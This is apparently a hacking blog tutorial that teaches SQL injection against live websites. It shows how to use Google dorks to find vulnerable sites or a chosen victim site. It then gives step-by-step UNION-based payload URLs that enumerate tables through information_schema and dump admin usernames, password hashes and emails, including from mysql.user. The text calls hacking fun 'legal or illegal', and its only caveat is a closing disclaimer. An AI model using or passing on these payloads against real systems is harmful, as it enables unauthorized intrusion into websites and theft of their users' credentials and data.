Hacking

Hacking Websites Using SQL Injection: A Complete Step-by-Step Guide

Hacking Websites Using SQL Injection

Hacking Websites is a fun for any hacker because he loves doing it, It doesn’t matter it is legal or illegal and It doesn’t means that he will do any wrong with them or with website owner. Sometime some hackers do website hacking because they want to learn something new or they just want to check their skills over the internet.

There are many methods for hacking websites and One of the most popular way is SQL Injection. SQL Injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution to dump the database contents to the attacker).

SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

What SQL and Database are?

Before we go in deep with SQL Injections and start hacking websites. We should know what SQL and Database are?

Database:

Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.

Some List of Database are:

  • DB servers,
  • MySQL(Open source),
  • MSSQL,
  • MS-ACCESS,
  • Oracle,
  • Postgre SQL(open source),
  • SQLite,

SQL:

Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer database. The name “SQL” is an abbreviation for Structured Query Language. For historical reasons, SQL is usually pronounced “sequel,” but the alternate pronunciation “S.Q.L.” is also used. As the name implies, SQL is a computer language that you use to interact with a database. In fact, SQL works with one specific type of database, called a relational database.

Simple Basic Queries for SQL:

Select * from table_name : this statement is used for showing the content of tables including column name.

For eg: select * from users;

Insert into table_name(column_names,…) values(corresponding values for columns): For inserting data to table.

For eg: insert into users(username,userid) values(“BreakTheSec”,”break”);

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?

SQL injection is Common and famous method of hacking websites at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

  • ByPassing Logins
  • Accessing secret data
  • Modifying contents of website
  • Shutting down the My SQL server

What Is Website Defacement?

Website defacement or Hacking Websites is an attack on a website that changes the visual appearance of the site or a web page. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti and, as other forms of vandalism, is also used to spread messages by politically motivated “Cyber Protesters” or “Hacktivists”.

Defacing a website simply means replacing the index.html file of a site by attacker’s own file. Now all the users who’ll open the website will see the page uploaded by the attacker.

Hacking Websites Using SQL Injection

Now let’s dive into the real procedure for the SQL Injection and Hacking Websites.

0. Finding Vulnerable Website:

Our best partner for SQL injection is Google. We can find the Vulnerable websites (hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use “inurl:” command for finding the vulnerable websites.

Some Examples:

  • inurl:index.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=
  • inurl:pageid=

How to use?

  • Copy one of the above command and paste in the google search engine box.
  • Hit enter.
  • You can get list of web sites.
  • We have to visit the websites one by one for checking the vulnerability.
  • So Start from the first website.

Note: If you like to hack particular website,then try this: site:www.victimsite.com dork_list_commands

For eg: site:www.victimsite.com inurl:index.php?id=

1. Vulnerability Check:

To check a vulnerable website for SQL Injection, you need to find a page that looks like this –

http://www.website.com/news.php?id=1

Now to test if it’s vulnerable, we add a ‘ (quote) to the end of URL and that would look like –

http://www.website.com/news.php?id=1′

If the database is vulnerable, the page will spit out a MySQL error something similar to –

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…

And that means the Site is vulnerable to SQL injection but if the page loads as normal then the website is not vulnerable to SQL Injection.

2. Finding the number of columns:

To find the number of columns in the database, we’ll use the statement ORDER BY which tells the database how to order the result. Well just incrementing the number until we get an error.

http://www.website.com/news.php?id=1 order by 1/* <– No Error
http://www.website.com/news.php?id=1 order by 2/* <– No Error
http://www.website.com/news.php?id=1 order by 3/* <– No Error
http://www.website.com/news.php?id=1 order by 4/* <– Error

We’ll get message like this: Unknown column ‘4’ in ‘order clause’ or something like that which means the database has 3 columns, as we got an error on 4.

3. Check for UNION function:

We now are going to use the “UNION” command to find the vulnerable columns because with the union command we can select more data in one SQL statement. So we have –

http://www.website.com/news.php?id=1 union all select 1,2,3/* (As we’ve already found that the number of columns is 3 in the second step.)

If we see some numbers on the screen, i.e 1 or 2 or 3 then the UNION works.

4. Check for DataBase Version:

We now need to find the database version, name, and user. We do this by replacing the vulnerable column numbers with the following commands:

  • user()
  • database()
  • version()

Or if these don’t work then try:

  • @@user
  • @@version
  • @@database

The URL would look like:

Check for DataBase Version 1

If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …” Then what we need is convert() function (I didn’t see any website article covering this problem, So I must cover it.)

Check for DataBase Version 2

Or with hex() and unhex()

Check for DataBase Version 3

The resulting page would then show the database user and then the MySQL version. For example [email protected] and MySQL 5.0.83.

IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

5. Obtaining Table And Column Name:

In this step, We aim to list all the table names in the database. The “table_name” goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. But in most of the cases, we must guess table and column name.

common table names are: user/s, admin/s, member/s, etc.

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.

URL would be http://www.website.com/news.php?id=1 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good)

We know that table admin exists. . .Now to check column names –

http://www.website.com/news.php?id=1 union all select 1, username, 3 from admin/* (if you get an error, then try the other column name)

We get username displayed on the screen, the example would be the admin, or superadmin etc. . .Now to check if column password exists –

http://www.website.com/news.php?id=1 union all select 1, password, 3 from admin/* (if you get an error, then try the other column name)

We’ll see the password on the screen in Hash or Plain-Text format, it depends on how the database is set up i.e md5 hash, mysql hash, sha1, etc.

Now we must complete query as of our need. And for that, we can use concat() function (it joins the strings).

i.e. http://www.website.com/news.php?id=1 union all select 1, concat(username,0x3a,password),3 from admin/*

Note: Here, I used 0x3a, its hex value for colon) ( The another way is to use ASCII Value for that. Example: char(58) ).

http://www.website.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get displayed username: password on screen, i.e admin: admin or admin: HACKAGON

When you have this, you can login like admin or some superuser. If can’t then guess the right table name, you can always try mysql.user (Default). It has user password columns, So the URL would be

http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6. Incase of MySQL 5:

Uptil step 5 is for MySQL version < 5 (i.e 4.1.33, 4.1.12, etc.) But for MySQL 5 we need information_schema. It holds all tables and columns in the database. To get tables, we use table_name and information_schema.tables.

i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.

i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Note: Here, I put 0,1 (Get 1’s result starting from the 0th)

Now to view the second table, we’ll change limit 0,1 to limit 1,1

i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed. Now for the third table, we put limit 2,1

i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing the limit until you get some useful table like db_admin, poll_user, auth, auth_user, etc.

To get the column names, the method will be the same. Where we use column_name and information_schema.columns.

The method will be as same as above. So the example would be –

http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed. The second one (we change limit 0,1 to limit 1,1)

i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing the limit until you get something like username, user, login, password, pass, passwd, etc.

If you wanna display column names for specific table use this query (where clause). Let’s say that we found table users.

i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*

Now we’ll get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note: This wouldn’t work if the magic quotes are ON.

Let’s say that we found columns user, pass, and email. Now complete the query to put them all together. For that we use concat(), As I used it earlier.

i.e. http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

We’ll get here user:pass:email from table users. Example: admin:hash:[email protected]

Note: – This guide about Hacking Websites is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this Hacking Websites article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Most Popular

To Top